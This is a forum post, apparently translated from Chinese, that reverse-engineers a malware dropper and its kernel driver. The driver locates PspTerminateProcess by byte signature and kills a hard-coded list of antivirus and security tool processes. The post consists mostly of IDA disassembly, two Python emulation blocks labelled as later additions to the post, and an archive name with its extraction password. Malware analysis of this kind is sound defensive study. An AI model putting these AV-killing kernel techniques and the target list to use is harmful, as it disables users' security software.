The one I posted yesterday got flagged as a YJ post.. hope this one won't be...
The sample is fairly simple and well suited to beginners.
First, the behaviour: the exe drops three files, Pcix32.sys, amd32_.sys and atax32.sys, but the latter two are just copies of the first. The sys file is responsible for watching for the startup of various antivirus and security tools, and kills them as soon as it spots one.
1. exe behaviour
I'll only sketch the idea here; for details refer to the idb file and trace it yourself, heh.
First it gets the system drivers directory, then drops Pcix32.sys into it, making various copies along the way.
Also, the exe checks whether Recovery Genius (还原精灵) is installed and handles it accordingly if so, but I'm too lazy.. couldn't be bothered to set up the environment; anyone interested can trace that part :)
If Recovery Genius isn't present, it loads the driver.
Finally there is an injection step, which I didn't trace carefully either :D
2. sys
This is the interesting part, so here's the code:
.text:00010B34 lea eax, [ebp+SystemInformation]
.text:00010B37 push eax ; ReturnLength
.text:00010B38 push 0 ; SystemInformationLength
.text:00010B3A push eax ; SystemInformation
.text:00010B3B push 0Bh ; SystemInformationClass
.text:00010B3D mov edi, ds:__imp_ZwQuerySystemInformation
.text:00010B43 call edi ; __imp_ZwQuerySystemInformation
.text:00010B45 push [ebp+SystemInformation] ; NumberOfBytes
.text:00010B48 push 1 ; PoolType
.text:00010B4A call ds:ExAllocatePool
Retrieves assorted system information...
.text:00010B5A push 0 ; ReturnLength
.text:00010B5C push [ebp+SystemInformation] ; SystemInformationLength
.text:00010B5F push esi ; SystemInformation
.text:00010B60 push 0Bh ; SystemInformationClass
.text:00010B62 call edi ; __imp_ZwQuerySystemInformation
.text:00010B64 test eax, eax
.text:00010B66 jl short loc_10BDE
.text:00010B68 mov ebx, [esi+0Ch]
.text:00010B6B mov edi, [esi+10h]
.text:00010B6E add edi, ebx
.text:00010B70 push 0 ; Tag
.text:00010B72 push esi ; P
.text:00010B73 call ds:ExFreePoolWithTag
.text:00010B79 mov esi, ebx
.text:00010B7B
.text:00010B7B loc_10B7B: ; CODE XREF: sub_10B28+BFj
.text:00010B7B cmp esi, edi
.text:00010B7D ja short loc_10BDE
.text:00010B7F push esi ; VirtualAddress
.text:00010B80 call ds:MmIsAddressValid
.text:00010B86 test al, al
.text:00010B88 jz short loc_10BE6
.text:00010B8A lea ebx, [esi+4]
.text:00010B8D push ebx ; VirtualAddress
.text:00010B8E call ds:MmIsAddressValid ; check the address is usable, to avoid a BSOD...
.text:00010B94 test al, al
.text:00010B96 jz short loc_10BE6
.text:00010B98 mov eax, 8B55FF8Bh ; google this value and you'll find it's PspTerminateProcess
.text:00010B9D cmp [esi], eax
.text:00010B9F jnz short loc_10BE6
.text:00010BA1 mov eax, 0CEC83ECh
.text:00010BA6 cmp [ebx], eax
.text:00010BA8 jnz short loc_10BE6
.text:00010BAA mov eax, 0FFF84D83h
.text:00010BAF cmp [esi+8], eax
.text:00010BB2 jnz short loc_10BE6
.text:00010BB4 mov eax, 7D8B5756h
.text:00010BB9 cmp [esi+0Ch], eax
.text:00010BBC jnz short loc_10BE6
.text:00010BBE and [ebp+ms_exc.disabled], 0
.text:00010BC2 mov [ebp+var_20], esi
.text:00010BC5 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010BCC mov eax, esi ; save the function address
The author was pretty thorough about this... if the function isn't found:
.text:00010A40 call _GetPspTerminateProcessAddress
.text:00010A45 mov PspTerminateProcess, eax
.text:00010A4A test eax, eax
.text:00010A4C jnz short loc_10A8F
.text:00010A4E call sub_10568
it goes looking for that PsTerminateProcess thing instead:
sub_10568 proc near ; CODE XREF: sub_10A30+1Ep
.text:00010568 push offset aPsterminatesys ; "PsTerminateSystemThread"
.text:0001056D push sysInfo
.text:00010573 call sub_10486
.text:00010578 xor ecx, ecx
.text:0001057A
.text:0001057A loc_1057A: ; CODE XREF: sub_10568+28j
.text:0001057A cmp byte ptr [eax], 0FFh ; 0xFF7508, i.e. psterminateprocess
.text:0001057D jnz short loc_1058B
.text:0001057F cmp byte ptr [eax+1], 75h
.text:00010583 jnz short loc_1058B
.text:00010585 cmp byte ptr [eax+2], 8
.text:00010589 jz short loc_10595
....
.text:00010595 loc_10595: ; CODE XREF: sub_10568+21j
.text:00010595 add eax, 5
.text:00010598 mov ecx, [eax]
.text:0001059A lea eax, [ecx+eax+4]
.text:0001059E retn
There are two more functions in between; I was pressed for time and didn't look at them closely, so I'll skip them....
Below is the find-and-kill function, the culprit that does the dirty work:
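To make the two lookup paths in the listings above concrete, here is an added analyst-side emulation (not the sample's code, and not from the original post): it plants the four-dword prologue and a fake PsTerminateSystemThread body in a constructed byte buffer standing in for the kernel image, then reproduces both the direct signature scan and the FF 75 08 / rel32 fallback. IMAGE_BASE, PSP_RVA and PSTST_RVA are assumed values chosen for the example.

```python
import struct

# Constructed, not from the sample: a fake 32-bit "kernel image" in which we plant the
# PspTerminateProcess prologue the driver looks for (the four immediates from the
# listing, little-endian) and a fake PsTerminateSystemThread body containing
# 'push dword ptr [ebp+8]' (FF 75 08), one 1-byte instruction, then 'call rel32' (E8).
PROLOGUE = b"".join(struct.pack("<I", d) for d in
                    (0x8B55FF8B, 0x0CEC83EC, 0xFFF84D83, 0x7D8B5756))
IMAGE_BASE = 0x804D7000   # assumed; the driver reads base/size from the module entry (+0Ch/+10h)
PSP_RVA = 0x1000          # where the prologue is planted (assumed)
PSTST_RVA = 0x2000        # where the fake PsTerminateSystemThread is planted (assumed)

def build_image():
    img = bytearray(b"\xCC" * 0x3000)
    img[PSP_RVA:PSP_RVA + 16] = PROLOGUE
    call_rva = PSTST_RVA + 4                     # FF 75 08, then 56 (push esi), then E8 at +4
    rel32 = PSP_RVA - (call_rva + 5)             # rel32 is relative to the end of the 5-byte call
    img[PSTST_RVA:PSTST_RVA + 9] = b"\xFF\x75\x08\x56\xE8" + struct.pack("<i", rel32)
    return bytes(img)

def find_by_prologue(img, base):
    """GetPspTerminateProcessAddress: compare the four dwords at every offset of
    [base, base+size). Returns 0 when not found, which is what the caller tests for.
    Note the driver only MmIsAddressValid-checks esi and esi+4 but also reads
    [esi+8] and [esi+0Ch]; a candidate straddling a page boundary is read unchecked."""
    for off in range(len(img) - 15):
        if img[off:off + 16] == PROLOGUE:
            return base + off
    return 0

def find_via_ps_terminate_system_thread(img, base, pstst_rva):
    """sub_10568 fallback: scan forward from PsTerminateSystemThread for FF 75 08, then
    'add eax,5; mov ecx,[eax]; lea eax,[ecx+eax+4]', i.e. target = rel32 + (addr+5) + 4."""
    off = pstst_rva
    while off + 9 <= len(img):
        if img[off:off + 3] == b"\xFF\x75\x08":
            off += 5
            rel32 = struct.unpack_from("<i", img, off)[0]
            return (base + off + 4 + rel32) & 0xFFFFFFFF
        off += 1
    return 0

if __name__ == "__main__":
    img = build_image()
    print(hex(find_by_prologue(img, IMAGE_BASE)))
    print(hex(find_via_ps_terminate_system_thread(img, IMAGE_BASE, PSTST_RVA)))
```

Both paths resolve to the same planted address; on a real kernel the prologue bytes are build-specific, which is why the driver keeps the second path as a fallback.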
.text:00010CEC mov edi, edi
.text:00010CEE push ebp
.text:00010CEF mov ebp, esp
.text:00010CF1 sub esp, 6A4h
.text:00010CF7 and [ebp+var_C], 0
.text:00010CFB push ebx
.text:00010CFC push esi
.text:00010CFD push edi
.text:00010CFE mov esi, 0FFFFh
.text:00010D03 push esi ; NumberOfBytes
.text:00010D04 mov ebx, offset aKvmonxp_exe ; "KVMonXp.exe"
.text:00010D09 push 1 ; PoolType
.text:00010D0B mov [ebp+SourceString], offset aNod32krn_exe ; "nod32krn.exe"
.text:00010D15 mov [ebp+var_C0], offset aEgui_exe ; "egui.exe"
.text:00010D1F mov [ebp+var_BC], offset aEkrn_exe ; "ekrn.exe"
.text:00010D29 mov [ebp+var_B8], offset a360tray_exe ; "360tray.exe"
.text:00010D33 mov [ebp+var_B4], offset a360safe_exe ; "360Safe.exe"
.text:00010D3D mov [ebp+var_B0], offset aSafeboxtray_ex ; "safeboxTray.exe"
.text:00010D47 mov [ebp+var_AC], offset a360safebox_exe ; "360safebox.exe"
.text:00010D51 mov [ebp+var_A8], offset a360sd_exe ; "360sd.exe"
.text:00010D5B mov [ebp+var_A4], offset aZhudongfangyu_ ; "ZhuDongFangYu.exe"
.text:00010D65 mov [ebp+var_A0], offset a360rp_exe ; "360rp.exe"
.text:00010D6F mov [ebp+var_9C], offset a360sdupd_exe ; "360sdupd.exe"
.text:00010D79 mov [ebp+var_98], offset a360rps_exe ; "360rps.exe"
.text:00010D83 mov [ebp+var_94], offset a3_0 ; "3"
.text:00010D8D mov [ebp+var_90], offset aO ; "O"
.text:00010D97 mov [ebp+var_8C], offset asc_11BDE ; "L"
.text:00010DA1 mov [ebp+var_88], offset aK_8 ; "K"
.text:00010DAB mov [ebp+var_84], offset aK_7 ; "k"
.text:00010DB5 mov [ebp+var_80], offset aK_6 ; "k"
.text:00010DBC mov [ebp+var_7C], offset aK_5 ; "k"
.text:00010DC3 mov [ebp+var_78], offset aK_4 ; "k"
.text:00010DCA mov [ebp+var_74], offset aU ; "u"
.text:00010DD1 mov [ebp+var_70], offset aKxescore_exe ; "kxescore.exe"
.text:00010DD8 mov [ebp+var_6C], offset aKxetray_exe ; "kxetray.exe"
.text:00010DDF mov [ebp+var_68], offset aK_3 ; "K"
.text:00010DE6 mov [ebp+var_64], offset aK ; "K"
.text:00010DED mov [ebp+var_60], offset aGuiyingfix_exe ; "guiyingfix.exe"
.text:00010DF4 mov [ebp+var_5C], offset aRavmond_exe ; "RavMonD.exe"
.text:00010DFB mov [ebp+var_58], offset aR_3 ; "R"
.text:00010E02 mov [ebp+var_54], offset aR ; "R"
.text:00010E09 mov [ebp+var_50], offset aRegguide_exe ; "RegGuide.exe"
.text:00010E10 mov [ebp+var_4C], offset aR_0 ; "R"
.text:00010E17 mov [ebp+var_48], offset aRscopy_exe ; "RsCopy.exe"
.text:00010E1E mov [ebp+var_44], offset aRav_exe ; "Rav.exe"
.text:00010E25 mov [ebp+var_40], offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010E2C mov [ebp+var_3C], offset word_119F2
.text:00010E33 mov [ebp+var_38], ebx
.text:00010E36 mov [ebp+var_34], offset aA ; "a"
.text:00010E3D mov [ebp+var_30], offset aIcesword_exe ; "IceSword.exe"
.text:00010E44 mov [ebp+var_2C], offset aS_0 ; "S"
.text:00010E4B mov [ebp+var_28], offset aR_1 ; "r"
.text:00010E52 mov [ebp+var_24], offset aKnownsvr_exe ; "knownsvr.exe"
.text:00010E59 mov [ebp+var_20], offset aR_2 ; "r"
.text:00010E60 mov [ebp+var_1C], offset aKnsdtray_exe ; "knsdtray.exe"
.text:00010E67 mov [ebp+var_18], offset aK_2 ; "k"
.text:00010E6E mov [ebp+var_14], offset aK_1 ; "k"
.text:00010E75 mov [ebp+var_10], offset aK_0 ; "k"
.text:00010E7C call ds:ExAllocatePool
.text:00010E82 mov edi, eax
.text:00010E84 mov [ebp+P], edi
.text:00010E87 test edi, edi
.text:00010E89 jz loc_10FA5
.text:00010E8F push offset Format ; "enter findprocessandkill\n"
.text:00010E94 call DbgPrint
.text:00010E99 pop ecx
.text:00010E9A lea eax, [ebp+ReturnLength]
.text:00010E9D push eax ; ReturnLength
.text:00010E9E push esi ; SystemInformationLength
.text:00010E9F push edi ; SystemInformation
.text:00010EA0 push 5 ; SystemInformationClass
.text:00010EA2 call ds:__imp_ZwQuerySystemInformation
.text:00010EA8 mov esi, edi
.text:00010EAA
.text:00010EAA loc_10EAA: ; CODE XREF: _FindAddKillProcess+2A8j
.text:00010EAA add esi, [esi]
.text:00010EAC xor eax, eax
.text:00010EAE lea edi, [esi+38h]
.text:00010EB1 cmp [edi], ax
.text:00010EB4 jz loc_10F91
.text:00010EBA mov [ebp+ReturnLength], eax
.text:00010EBD
.text:00010EBD loc_10EBD: ; CODE XREF: _FindAddKillProcess+29Fj
.text:00010EBD push [ebp+eax*4+SourceString] ; SourceString
.text:00010EC4 lea eax, [ebp+eax*8+DestinationString]
.text:00010ECB push eax ; DestinationString
.text:00010ECC call ds:RtlInitUnicodeString
.text:00010ED2 mov eax, [ebp+ReturnLength]
.text:00010ED5 push 1 ; CaseInSensitive
.text:00010ED7 lea eax, [ebp+eax*8+DestinationString]
.text:00010EDE push eax ; String2
.text:00010EDF push edi ; String1
.text:00010EE0 call ds:RtlCompareUnicodeString
.text:00010EE6 test eax, eax
.text:00010EE8 jnz loc_10F7C
.text:00010EEE mov eax, [ebp+ReturnLength]
.text:00010EF1 push offset aKvsrvxp_exe ; "KVSrvXP.exe"
.text:00010EF6 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010EFD call ds:_wcsicmp
.text:00010F03 pop ecx
.text:00010F04 pop ecx
.text:00010F05 test eax, eax
.text:00010F07 jz short loc_10F75
.text:00010F09 mov eax, [ebp+ReturnLength]
.text:00010F0C push offset word_119F2 ; wchar_t *
.text:00010F11 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F18 call ds:_wcsicmp
.text:00010F1E pop ecx
.text:00010F1F pop ecx
.text:00010F20 test eax, eax
.text:00010F22 jz short loc_10F75
.text:00010F24 mov eax, [ebp+ReturnLength]
.text:00010F27 push ebx ; wchar_t *
.text:00010F28 push [ebp+eax*4+SourceString] ; wchar_t *
.text:00010F2F call ds:_wcsicmp
.text:00010F35 pop ecx
.text:00010F36 pop ecx
.text:00010F37 test eax, eax
.text:00010F39 jz short loc_10F75
.text:00010F3B mov eax, [ebp+ReturnLength]
.text:00010F3E push [ebp+eax*4+SourceString]
.text:00010F45 push offset aFindProcesssWs ; "Find Processs: %ws\n"
.text:00010F4A call DbgPrint
.text:00010F4F pop ecx
.text:00010F50 pop ecx
.text:00010F51 push dword ptr [esi+44h] ; PEPROCESS
.text:00010F54 call KillProcess
.text:00010F59 test eax, eax
.text:00010F5B jl short loc_10F7C
.text:00010F5D mov eax, [ebp+ReturnLength]
.text:00010F60 push [ebp+eax*4+SourceString]
.text:00010F67 push offset aKillProcesssWs ; "Kill Processs: %ws OK!\n"
.text:00010F6C call DbgPrint
.text:00010F71 pop ecx
.text:00010F72 pop ecx
.text:00010F73 jmp short loc_10F7C
.text:00010F75 ; ---------------------------------------------------------------------------
.text:00010F75
.text:00010F75 loc_10F75: ; CODE XREF: _FindAddKillProcess+21Bj
.text:00010F75 ; _FindAddKillProcess+236j ...
.text:00010F75 mov byte_1212C, 1
.text:00010F7C
.text:00010F7C loc_10F7C: ; CODE XREF: _FindAddKillProcess+1FCj
.text:00010F7C ; _FindAddKillProcess+26Fj ...
.text:00010F7C mov eax, [ebp+ReturnLength]
.text:00010F7F inc eax
.text:00010F80 cmp [ebp+eax*4+SourceString], 0
.text:00010F88 mov [ebp+ReturnLength], eax
.text:00010F8B jnz loc_10EBD
.text:00010F91
.text:00010F91 loc_10F91: ; CODE XREF: _FindAddKillProcess+1C8j
.text:00010F91 cmp dword ptr [esi], 0
.text:00010F94 jnz loc_10EAA
.text:00010F9A push 0 ; Tag
.text:00010F9C push [ebp+P] ; P
.text:00010F9F call ds:ExFreePoolWithTag
.text:00010FA5
.text:00010FA5 loc_10FA5: ; CODE XREF: _FindAddKillProcess+19Dj
.text:00010FA5 pop edi
.text:00010FA6 pop esi
.text:00010FA7 pop ebx
.text:00010FA8 leave
.text:00010FA9 retn
It loops through a pile of security tools and kills any it finds~
Heh, let's take a look at how it kills them:
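As an added example (my own code, not the driver's or the original post's), this emulates the loop at loc_10EAA over a constructed 32-bit SystemProcessInformation (class 5) buffer using the offsets the listing reads (NextEntryOffset at +0, ImageName at +38h, UniqueProcessId at +44h), including the three names that only set byte_1212C rather than being killed. POOL_BASE and HDR are assumed layout values for the constructed buffer; the single-character strings IDA shows in the listing and word_119F2 are not recoverable and are left out.

```python
import struct

# Kill list as the driver lays it out on the stack (from the listing above). The three
# names compared with _wcsicmp only set the flag byte_1212C instead of being killed;
# word_119F2 is the third such name and its text is not visible in the listing.
KILL_LIST = ["nod32krn.exe", "egui.exe", "ekrn.exe", "360tray.exe", "360Safe.exe",
             "safeboxTray.exe", "360safebox.exe", "360sd.exe", "ZhuDongFangYu.exe",
             "360rp.exe", "360sdupd.exe", "360rps.exe", "kxescore.exe", "kxetray.exe",
             "guiyingfix.exe", "RavMonD.exe", "RegGuide.exe", "RsCopy.exe", "Rav.exe",
             "KVSrvXP.exe", "KVMonXp.exe", "IceSword.exe", "knownsvr.exe", "knsdtray.exe"]
FLAG_ONLY = {"KVSrvXP.exe", "KVMonXp.exe"}
POOL_BASE = 0x81000000   # constructed pool address; ImageName.Buffer holds absolute pointers
HDR = 0x48               # header bytes we model per entry; the UTF-16 name text follows it

def build_list(procs):
    """Lay out (pid, name) pairs as a 32-bit class-5 buffer the way the driver reads it:
    NextEntryOffset at +0, ImageName UNICODE_STRING at +38h, UniqueProcessId at +44h."""
    out = bytearray()
    for i, (pid, name) in enumerate(procs):
        raw = name.encode("utf-16-le")
        entry = bytearray(HDR + len(raw) + 2)
        struct.pack_into("<I", entry, 0, len(entry) if i < len(procs) - 1 else 0)
        struct.pack_into("<HHI", entry, 0x38, len(raw), len(raw) + 2, POOL_BASE + len(out) + HDR)
        struct.pack_into("<I", entry, 0x44, pid)
        entry[HDR:HDR + len(raw)] = raw
        out += entry
    return bytes(out)

def walk_like_driver(buf):
    """Emulate loc_10EAA..loc_10F94. Returns (pids the driver would hand to KillProcess,
    whether byte_1212C was set). The first entry is always skipped ('add esi,[esi]' runs
    before any check), and the status of the class-5 query is never tested, so a process
    list larger than the fixed 0FFFFh-byte buffer would be walked as garbage."""
    killed, flag, off = [], False, 0
    while True:
        off += struct.unpack_from("<I", buf, off)[0]            # add esi, [esi]
        length, _, ptr = struct.unpack_from("<HHI", buf, off + 0x38)
        if length:                                              # cmp [edi], ax / jz loc_10F91
            name = buf[ptr - POOL_BASE:ptr - POOL_BASE + length].decode("utf-16-le")
            for target in KILL_LIST:                            # RtlCompareUnicodeString(.., TRUE)
                if name.lower() != target.lower():
                    continue
                if target in FLAG_ONLY:
                    flag = True                                 # mov byte_1212C, 1
                else:
                    killed.append(struct.unpack_from("<I", buf, off + 0x44)[0])
        if struct.unpack_from("<I", buf, off)[0] == 0:          # cmp dword ptr [esi], 0
            return killed, flag
```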
KillProcess proc near ; CODE XREF: _FindAddKillProcess+268p
.text:00010CB0
.text:00010CB0 PEPROCESS = dword ptr 8
.text:00010CB0
.text:00010CB0 mov edi, edi
.text:00010CB2 push ebp
.text:00010CB3 mov ebp, esp
.text:00010CB5 lea eax, [ebp+PEPROCESS]
.text:00010CB8 push eax
.text:00010CB9 push [ebp+PEPROCESS]
.text:00010CBC call PsLookupProcessByProcessId
.text:00010CC1 test eax, eax
.text:00010CC3 jl short loc_10CCE
.text:00010CC5 mov ecx, [ebp+PEPROCESS] ; Object
.text:00010CC8 call ds:ObfDereferenceObject
.text:00010CCE
.text:00010CCE loc_10CCE: ; CODE XREF: KillProcess+13j
.text:00010CCE push [ebp+PEPROCESS]
.text:00010CD1 call sub_10C4E
.text:00010CD6 test eax, eax
.text:00010CD8 jl short loc_10CDE
.text:00010CDA xor eax, eax
.text:00010CDC jmp short loc_10CE3
.text:00010CDE ; ---------------------------------------------------------------------------
.text:00010CDE
.text:00010CDE loc_10CDE: ; CODE XREF: KillProcess+28j
.text:00010CDE mov eax, 0C0000001h
.text:00010CE3
.text:00010CE3 loc_10CE3: ; CODE XREF: KillProcess+2Cj
.text:00010CE3 pop ebp
.text:00010CE4 retn 4
.text:00010CE4 KillProcess endp
Then the call at 00010CD1:
.text:00010C50 push offset unk_12088
.text:00010C55 call __SEH_prolog4
.text:00010C5A xor edi, edi
.text:00010C5C mov [ebp+var_1C], edi
.text:00010C5F mov [ebp+ms_exc.disabled], edi
.text:00010C62 push edi ; Object
.text:00010C63
.text:00010C63 loc_10C63: ; CODE XREF: sub_10C4E+32j
.text:00010C63 push [ebp+PEPROCESS] ; PEPROCESS
.text:00010C66 call sub_10BEE
.text:00010C6B mov esi, eax
.text:00010C6D cmp esi, edi
.text:00010C6F jz short loc_10C99
.text:00010C71 mov [ebp+var_1C], edi
.text:00010C74 push edi
.text:00010C75 push esi
.text:00010C76 call PspTerminateProcess
.text:00010C7C mov [ebp+var_1C], eax
.text:00010C7F push esi
.text:00010C80 jmp short loc_10C63
.text:00010C82 ; ---------------------------------------------------------------------------
.text:00010C82
.text:00010C82 loc_10C82: ; DATA XREF: .rdata:0001209Co
.text:00010C82 mov eax, [ebp+ms_exc.exc_ptr]
.text:00010C85 mov eax, [eax]
.text:00010C87 mov eax, [eax]
.text:00010C89 mov [ebp+var_20], eax
.text:00010C8C xor eax, eax
.text:00010C8E inc eax
.text:00010C8F retn
.text:00010C90 ; ---------------------------------------------------------------------------
.text:00010C90
.text:00010C90 loc_10C90: ; DATA XREF: .rdata:000120A0o
.text:00010C90 mov esp, [ebp+ms_exc.old_esp]
.text:00010C93 mov eax, [ebp+var_20]
.text:00010C96 mov [ebp+var_1C], eax
.text:00010C99
.text:00010C99 loc_10C99: ; CODE XREF: sub_10C4E+21j
.text:00010C99 mov [ebp+ms_exc.disabled], 0FFFFFFFEh
.text:00010CA0 mov eax, [ebp+var_1C]
.text:00010CA3 call __SEH_epilog4
.text:00010CA8 retn 4
.text:00010CA8 sub_10C4E endp
I'll stop here.. it's written a bit sketchily, sorry everyone...
Extraction password: pediy
Virus.rar